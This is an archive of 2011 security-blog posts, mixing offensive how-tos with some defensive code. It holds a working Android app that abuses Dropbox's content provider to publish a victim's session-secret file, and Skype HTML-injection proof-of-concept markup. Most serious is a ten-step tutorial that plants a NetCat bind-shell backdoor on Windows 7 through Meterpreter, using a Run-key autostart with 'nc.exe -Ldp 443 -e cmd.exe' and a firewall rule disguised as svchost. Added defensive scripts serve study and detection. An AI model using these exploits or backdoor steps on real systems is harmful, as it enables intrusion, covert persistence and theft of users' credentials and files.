Aug 20, 2011

Dropbox for Android Vulnerability Breakdown

Dropbox vulnerabilities are back and they’re mobile. This week Tyrone Erasmus released a vulnerability in the Android Dropbox client that lets other apps write to its content database and, through it, publish your files to the public. I wanted to break down this vulnerability because the lesson isn’t that Dropbox is vulnerable; it’s that bad Android programming practices are happening everywhere. Normally we don’t want any app to have access to another app’s content provider, so we block them all by default. This is done in a couple of ways, one of them being restricting the file permissions so only the app’s own UID and GID can reach the data. But in some cases a content provider wants to share its information with other places on the Android platform. Take for example an email app that handles attachments. The content provider should be secured so that other apps can’t access its emails, but if an email has an attachment like an image file, the app may want to share that data with other apps like the Gallery viewer. This is where URI permissions come into play, as a way of sharing the content provider in a controlled way. Tyrone took advantage of the permissions allowed on the content provider of the Dropbox app.
Dropbox for Android, versions 1.1.3 and earlier, set the permissions of its content provider using the <grant-uri-permission> tag inside AndroidManifest.xml. There’s nothing wrong with that in itself, but grant-uri-permission takes an android:path value, which names the portion of the provider’s content that other apps can be granted access to. So what happens if that value is “/”? Yeah. Exactly.

But what’s in this content provider? Let’s take a look inside the Dropbox database in /data/app/

You’ll see that the database keeps track of the files that are being synced. What’s interesting to me is the _data field. When you want to add a file to Dropbox, a new record is created that fills in _data with the path of the file to upload. What happens if you were to tell it to upload something sensitive like /data/data/? The prefs.db contains the secret key and private information you can use to hijack a Dropbox session. Telling it to store the file in a location under the Public folder will upload it to a world-readable web address. Something like this:

Let’s put this all together into a simple app.

package com.antitree.dropdropbox;

import android.app.Activity;
import android.content.ContentValues;
import android.net.Uri;
import android.os.Bundle;

public class DropDropBoxActivity extends Activity {

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        // begin exploit
        // content:// URI of the Dropbox provider
        Uri dropbox_uri = Uri.parse("content://");
        ContentValues values = new ContentValues();
        // path to file to upload. Could also be a file on the sdcard
        values.put("_data", "/data/data/");
        // Without this the system won’t think the file needs syncing
        values.put("local_modified", 1);
        // Tyrone’s logic flaw that blocks it from being able to be deleted
        values.put("_display_name", "");
        values.put("is_favorite", 1);
        values.put("revision", 0);
        values.put("icon", "page_white_text");
        values.put("is_dir", 0);
        // where the file lands in the user’s Dropbox: the Public folder
        values.put("path", "/Public/prefs.db");
        values.put("canon_path", "/public/prefs.db");
        values.put("root", "dropbox");
        values.put("mime_type", "text/xml");
        values.put("thumb_exists", 0);
        values.put("parent_path", "/Public/");
        values.put("canon_parent_path", "/public/");
        // hand the record to the Dropbox content provider
        this.getContentResolver().update(dropbox_uri, values, null, null);
    }
}

This is an example of what Tyrone created: it adds a new record to the Dropbox content provider telling it to upload prefs.db to the user’s Public folder. This is a pretty boring exploit example, but with access to the sdcard and some malware kung-fu, I think you can dream up something much better.
The attack scenario for this vulnerability requires that the attacker be able to install the malicious app on the device of a user running a version earlier than 1.1.4, and be able to find out the victim’s Dropbox ID to retrieve the files. If you’re a Dropbox user, the best way to protect yourself is to update to the latest version, which came out weeks ago. If you feel like you’ve already been exploited, you’ll need to change your passwords and re-enroll the device. You may want to consider creating a new account if an attacker already has your user ID.
In the latest version, 1.2.3, what’s interesting is that they didn’t change the AndroidManifest.xml permission issue at all. They put the entire app into secure storage. It resolves the issue this time, but did it fix the bad programming practices? The takeaway from all this shouldn’t be that Dropbox has a vulnerability, but rather that improper Android development practices are happening even in larger projects like Dropbox.
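As an added example (my own code, not from the original post and not Dropbox’s manifest), here is a small manifest audit in Python that flags the pattern described above: a provider with no android:exported attribute, an exported provider with no permission attributes, or a <grant-uri-permission> whose path, pathPrefix or pathPattern covers the whole provider. The two manifests inside it are constructed: the authority com.example.sync.provider and the /attachments/ subtree are made up, and the weak one mirrors the “/” grant the post describes while the second shows the narrowed form an email-attachment style provider would use.

```python
import xml.etree.ElementTree as ET
from typing import List, Tuple

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Grant scopes that amount to "everything under this provider".
BROAD_GRANTS = {
    "path": {"/", ""},
    "pathPrefix": {"/", ""},
    "pathPattern": {".*", "/.*"},
}
PERMISSION_ATTRS = ("permission", "readPermission", "writePermission")


def audit_manifest(manifest_xml: str) -> List[Tuple[str, str]]:
    """Return (authority, finding) pairs for risky <provider> declarations."""
    root = ET.fromstring(manifest_xml)
    findings = []
    for provider in root.iter("provider"):
        authority = provider.get(ANDROID_NS + "authorities", "<no authorities>")
        exported = provider.get(ANDROID_NS + "exported")
        has_permission = any(provider.get(ANDROID_NS + a) for a in PERMISSION_ATTRS)

        if exported is None:
            # Before API level 17 a provider without android:exported is exported.
            findings.append((authority,
                             "android:exported not set; defaults to exported on targetSdkVersion below 17"))
        elif exported == "true" and not has_permission:
            findings.append((authority, "exported with no permission attribute"))

        for grant in provider.findall("grant-uri-permission"):
            for attr, broad_values in BROAD_GRANTS.items():
                value = grant.get(ANDROID_NS + attr)
                if value is not None and value in broad_values:
                    findings.append((authority,
                                     f'grant-uri-permission android:{attr}="{value}" covers the whole provider'))
    return findings


# Constructed manifest resembling the weak shape described in the post (made-up authority).
WEAK_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.sync">
  <application>
    <provider android:name=".SyncProvider"
              android:authorities="com.example.sync.provider">
      <grant-uri-permission android:path="/" />
    </provider>
  </application>
</manifest>"""

# Constructed hardened form: not exported, URI grants limited to one subtree.
HARDENED_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.sync">
  <application>
    <provider android:name=".SyncProvider"
              android:authorities="com.example.sync.provider"
              android:exported="false"
              android:grantUriPermissions="false">
      <grant-uri-permission android:pathPrefix="/attachments/" />
    </provider>
  </application>
</manifest>"""


if __name__ == "__main__":
    for label, manifest in (("weak", WEAK_MANIFEST), ("hardened", HARDENED_MANIFEST)):
        print(f"{label}:")
        for authority, finding in audit_manifest(manifest) or [("-", "no findings")]:
            print(f"  {authority}: {finding}")
```

The hardened manifest is the email-attachment pattern from the post: the provider stays private, and only the /attachments/ subtree can ever be handed to another app through a temporary URI grant on an Intent. Running the audit over a build’s merged manifest is a cheap check to add to a release pipeline.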


If you like my blog, Please Donate Me

Aug 19, 2011

BackTrack 5 r1 patch Wireless Driver rt2800usb

BackTrack 5 R1 contains patched stock kernel wireless drivers with several injection patches applied. Depending on card and setup, these drivers might not suit you.


In some cases we've seen cards using the rt2800usb driver (such as the ALFA AWUS036NH and AWUS036NEH) behave strangely with the BT5R1 kernel. If this happens to you, you can try installing a recent compat-wireless and building it yourself. This specific version will work:
root@bt:~# ln -s /usr/src/linux /lib/modules/
root@bt:~# cd /usr/src/
root@bt:~# wget
root@bt:~# tar jxpf compat-wireless-2011-07-14.tar.bz2  
root@bt:~# wget
root@bt:~# tar xpf 2.6.39.patches.tar
root@bt:~# cd compat-wireless-2011-07-14 
root@bt:~# patch -p1 < ../patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch 
root@bt:~# patch -p1 < ../patches/mac80211.compat08082009.wl_frag+ack_v1.patch 
root@bt:~# patch -p1 < ../patches/zd1211rw-2.6.28.patch 
root@bt:~# patch -p1 < ../patches/ipw2200-inject.2.6.36.patch 
root@bt:~# make 
root@bt:~# make install
root@bt:~# reboot



Installing VMware Tools in BackTrack 5 R1

In case you need to install the VMware Tools manually, you first have to prepare your kernel source by issuing the following command:

root@bt:~# ln -s /usr/src/linux /lib/modules/

  • Next, in VMware Player, click Virtual Machine -> Install VMware Tools.
  • Now let's quickly set up the VMware Tools by issuing the following commands:

root@bt:~# mkdir /mnt/cdrom; mount /dev/cdrom  /mnt/cdrom
root@bt:~# cp /mnt/cdrom/VMwareTools-<version>.tar.gz /tmp/
root@bt:~# cd /tmp/
root@bt:~# tar zxpf VMwareTools-<version>.tar.gz 
root@bt:~# cd vmware-tools-distrib/
root@bt:~# ./ 

NOTE: After this a series of questions will come up; if you are unsure about them, just leave them at their defaults.
  • We now need to apply some patches to the VMware kernel module sources before they are built, so answer "no" at this prompt:
Before running VMware Tools for the first time, you need to configure it by 
invoking the following command: "/usr/bin/". Do you want 
this program to invoke the command for you now? [yes] no
  • Now we apply the vmware-tools 2.6.39 patch:
root@bt:~# cd /usr/lib/vmware-tools/modules/source/
root@bt:~# for file in *.tar;do tar xpf $file;done
root@bt:~# rm *.tar
root@bt:~# wget
root@bt:~# patch -p1 < vmtools2639.patch 
root@bt:~# for dir in $(ls -l |grep only|awk -F" " '{print $8}' |cut -d"-" -f1);do tar cvf $dir.tar $dir-only;rm -rf $dir-only;done
  • If running in Mac Fusion, the patch won't apply cleanly. Accept the defaults and continue.
  • Continue with the installation to the end, and hopefully all the VMWare modules should compile!
  • Bring back your pretty console and reboot:
root@bt:~# fix-splash
root@bt:~# shutdown -r 0



BackTrack 5 R1 was released

We’re finally ready to release BackTrack 5 R1. This release contains over 120 bug fixes, 30 new tools and 70 tool updates. We will be rolling out some howtos on our wiki in the next few days, such as VMWare tool installation, alternate compat-wireless setups, etc. The kernel was updated to and includes the relevant injection patches. As usual, please report bugs to us through our redmine ticket system for the fastest response. Don’t forget to also check our forums and wiki (will be updated in the next few days).
We are really happy with this release, and believe that as with every release, this is our best one yet. Some pesky issues such as rfkill in VMWare with rtl8187 issues have been fixed, which provides for a much more solid experience with BackTrack.
We’ve released Gnome and KDE ISO images for 32 and 64 bit (no arm this release, sorry!), as well as a VMWare image of a 32 bit Gnome install, with VMWare Tools pre-installed.
Lastly, I would like to thank the whole BackTrack team for pulling off the late nights working on this release, as well as Offensive Security for funding all of this stuff. If you need real world Penetration Testing Training – head on over to Offensive-Security and get ready for a bumpy ride!


Aug 18, 2011

Skype - HTML/(Javascript) code injection

- Public Security Advisory -


Skype Limited -

Affected Software:
Software: Skype
Version: <=

Affected Platforms:
Windows (XP, Vista, 7)

Vulnerability Class:
HTML/(Javascript) code injection

Skype suffers from a persistent code injection vulnerability due to a lack
of input validation and output sanitization of the following profile entries:
- home
- office
- mobile

Proof of Concept:
The following HTML code can be used to trigger the described vulnerability:

--- SNIP ---

Home Phone Number:

Office Phone Number:
<center><i>INJECTION HERE</i></center>

Mobile Phone Number:
<a href="#">INJECTION HERE</a>

--- SNIP ---

For a PoC demonstration see:

An attacker could, for example, inject HTML/Javascript code. It has not been
verified, though, whether it is possible to hijack cookies or to attack the underlying
operating system. An attacker could give it a try using external .js files...

Threat Level:
Low - ?

Skype has to validate the input characters and sanitize the output.

Skype hasn't fixed the issue yet.
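As an added example, not part of the advisory and not Skype’s code, here is what the fix it asks for looks like in Python: an input validator that only accepts phone-number characters for the home, office and mobile fields, and an output encoder that HTML-escapes whatever is displayed, so a stored payload is shown as text rather than rendered. The PoC strings from the advisory are used as constructed test inputs; the function names and the phone-number pattern are my own choices.

```python
import html
import re
from typing import Dict, Optional

# Input validation: a phone number is a digit string with an optional leading "+"
# and a few common separators. Anything else (angle brackets, quotes, ...) is rejected.
PHONE_RE = re.compile(r"^\+?[0-9][0-9 ()./-]{0,30}$")

PROFILE_FIELDS = ("home", "office", "mobile")


def validate_phone(value: str) -> Optional[str]:
    """Return the trimmed phone number, or None if the input is not a phone number."""
    candidate = value.strip()
    if not PHONE_RE.fullmatch(candidate):
        return None
    return candidate


def encode_for_html(value: str) -> str:
    """Output sanitization: escape &, <, >, " and ' so the browser shows text, not markup."""
    return html.escape(value, quote=True)


def render_profile(profile: Dict[str, str]) -> Dict[str, str]:
    """Build the displayed profile: reject bad input, and encode everything on output.

    Encoding is applied even to values that passed validation, so a gap in the
    validator (or data written before it existed) still cannot inject markup.
    """
    rendered = {}
    for field in PROFILE_FIELDS:
        clean = validate_phone(profile.get(field, ""))
        if clean is None:
            rendered[field] = "(invalid phone number)"
        else:
            rendered[field] = encode_for_html(clean)
    return rendered


# Constructed profile: one valid number plus the advisory's two PoC payloads.
SAMPLE_PROFILE = {
    "home": "+1 555 0100",
    "office": "<center><i>INJECTION HERE</i></center>",
    "mobile": '<a href="#">INJECTION HERE</a>',
}

if __name__ == "__main__":
    for field, shown in render_profile(SAMPLE_PROFILE).items():
        print(f"{field:7}: {shown}")
    # What output encoding alone does to a payload that slipped past validation:
    print(encode_for_html(SAMPLE_PROFILE["mobile"]))
```

The two layers are independent on purpose: validation keeps garbage out of the profile store, and encoding at render time protects every client that displays the field, which is the layer that was missing here.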



Howto: 10 Steps to Use NetCat as a Backdoor in Windows 7 System

Requirements:
2. Meterpreter script (you get a Meterpreter session once you have successfully compromised the victim with the selected payload)

Step By Step :

1. First you need to gain access to the victim computer and get a Meterpreter session from the payload (I'm using the Java signed applet from my previous tutorial).
2. Next you need to upload nc.exe to the victim computer with the following Meterpreter command:
upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32

This uploads nc.exe and places it in C:\windows\system32 on the victim computer.

If the upload fails (see the picture above), you need to escalate your privileges to the SYSTEM account (see the privilege escalation tutorial here).

3. When the upload succeeds it will look like this:

4. Next we need to configure the registry so NetCat runs at Windows startup and listens on port 443. We do this by editing the key "HKLM\software\microsoft\windows\currentversion\run".

Enumerate the supplied registry key:
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run


5. Then add NetCat to the startup programs by running this command:

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

Successful set nc.
6. To check that our backdoor has actually been added to the autorun list:
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc


7. Up to this point everything looks okay. Next we need to allow remote connections through the firewall to our NetCat backdoor, using the netsh command to open port 443.

Run the shell command from Meterpreter to get a command prompt, and then run:
netsh advfirewall firewall add rule name="svchost service" dir=in action=allow protocol=TCP localport=443


8. After adding the firewall rule, let's check that the new rule is really present with this command:

netsh firewall show portopening


9. Everything has been set up so far; now we run netcat to try to connect to the victim computer:

nc -v victim_ip_address port
10. Let's test the backdoor by restarting the victim computer, using the reboot command from Meterpreter or shutdown -r -t 00 from the Windows console, and then connecting again with NetCat as in step 9.
meterpreter > reboot


C:\windows\system32>shutdown -r -t 00
If netcat gives us a console, then we have successfully injected a NetCat backdoor into the victim computer.

Countermeasures :

1. When you have the Windows firewall enabled, make sure you also have another personal firewall installed to detect inbound or outbound packets.
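As an added defensive example (my own code, not from the tutorial), here is a Python check that parses the text output of reg query for the Run key and flags values that launch a bind-shell style listener, such as the nc.exe -Ldp 443 -e cmd.exe entry created in step 5. The sample reg query output is constructed; the value names, the SecurityHealth entry and the layout are made up to resemble real output, and the detection rules (known netcat binary names, an -e/-c execute switch, an -l/-L listen switch) are heuristics I chose.

```python
import re
from typing import Dict, List

# A value line in `reg query` output looks like:
#     <name>    <REG_TYPE>    <data>
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s+(.*)$")

# Heuristics: binaries and switches typical of a netcat-style listener with a shell attached.
LISTENER_BINARIES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}
EXEC_SWITCHES = {"-e", "-c", "--exec", "--sh-exec"}
LISTEN_SWITCH = re.compile(r"^-[A-Za-z]*[lL]|^--listen$")


def parse_run_key(reg_output: str) -> Dict[str, str]:
    """Map autorun value names to their command lines from `reg query` text."""
    entries = {}
    for line in reg_output.splitlines():
        match = VALUE_LINE.match(line)
        if match:
            name, _reg_type, data = match.groups()
            entries[name] = data.strip()
    return entries


def suspicious_autoruns(reg_output: str) -> List[Dict[str, str]]:
    """Return autorun entries whose command line looks like a listener that spawns a shell."""
    hits = []
    for name, cmd in parse_run_key(reg_output).items():
        tokens = cmd.split()
        if not tokens:
            continue
        # Take the file name of the launched binary, ignoring quotes and directory.
        binary = tokens[0].strip('"').lower().rsplit("\\", 1)[-1]
        switches = tokens[1:]

        reasons = []
        if binary in LISTENER_BINARIES:
            reasons.append(f"autorun launches {binary}")
        if any(t in EXEC_SWITCHES for t in switches):
            reasons.append("spawns a program on connect (-e/-c)")
        if any(LISTEN_SWITCH.match(t) for t in switches):
            reasons.append("listens for inbound connections (-l/-L)")

        # Report on a known binary or an execute switch; a bare listen switch is too common alone.
        if binary in LISTENER_BINARIES or any(t in EXEC_SWITCHES for t in switches):
            hits.append({"value": name, "command": cmd, "reasons": "; ".join(reasons)})
    return hits


# Constructed `reg query` output: one ordinary entry and the value the tutorial adds.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    nc    REG_SZ    C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe
"""

if __name__ == "__main__":
    for hit in suspicious_autoruns(SAMPLE_REG_QUERY):
        print(f"{hit['value']}: {hit['command']}\n    {hit['reasons']}")
```

Feed it the output of reg query on each of the Run and RunOnce keys (HKLM and HKCU). The firewall rule from step 7 is the other artifact worth reviewing: an inbound allow rule whose name suggests a system service but whose target is a stand-alone executable in system32 is the same pattern seen from the other side.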
Hope it's useful 


Leak of APT domains

If you want to see all in the list, please go to the Source.
Hello security community. I’ve compiled the following information for your viewing pleasure. I hope this isn’t as misconstrued as

This information is by no means the result of a singular analysis of a public Chinese hacking utility. At least three distinct threat groups were profiled in Joe Stewart’s analysis; however, no distinction was paid to the actual actors themselves as each was identified by a single means. I’m not going to pay homage to the other two actors, as I’m sure the US government and other private entities will have enough problems recovering from this singular data exposure. My motivation is purely selfless in nature and I only wish the security community to improve upon what has already been done in this realm. Most of the security community is a fraud and continues to subsist on half-assed analyses and bogus data. All information was compiled from open sources and leaked information; no customer-based data was used for the analysis. My sincerest apologies go out to those with ongoing monitoring operations on any of the IP addresses involved.

These attacks have targeted US and Canadian companies almost exclusively for at least five years; the tools, tactics, and procedures have changed very little during that timeframe and continue to be extremely effective. Several private companies currently monitor several of these IP addresses for the purpose of supplying stolen information back to the affected companies. Stolen data is effectively held hostage for the price of doing business with the company in the know. On the other hand, if you’re lucky, the government will notify you of a breach within six months or less. The more likely scenario though is that you will never hear a thing from anyone unless your business is of significant financial importance or you can afford to pay the exorbitant price of the private companies. Currently the FBI, AF OSI, and NCIS may provide these ‘notifications’ to affected companies. In recent years each branch has become significantly more segmented and isolated; as such, the overall quality of the information provided to the affected companies has degraded. Private entities continue to prosper off of this information to the tune of millions of dollars annually and the affected companies continue to leak money and data to the attackers.

I’m not of the mindset to define the attacker or their motivations; however, it’s easy to glean that the interests are economic in nature and purely financial in motivation. If your company is one outlined in the list below, chances are you’re doing business in the People’s Republic of China or plan to shortly. Negotiations are a common target for economically motivated hackers and hence email and other relevant information pertaining to contract negotiation data will be taken. If you currently conduct business with the PRC, chances are that your organization has knowingly or unknowingly been compromised. The domains presented below represent only a small fraction of those that are currently active and reflect only the activities of a singular group of individuals. The data has not been truncated and reflects several months of monitoring; non-routable IP addresses and google/yahoo domains are normal for inactive domains. If you don’t know what to do with the information provided in this leak you deserve to continue to get fucked as you already have been, and you probably will be once again as tactics change. This should not be construed as the totality of ongoing activity, only a harbinger of what’s to come. I have no allegiances, I make no money, I am not legion.

-RSA Employee #15666

----------------Begin Data----------------
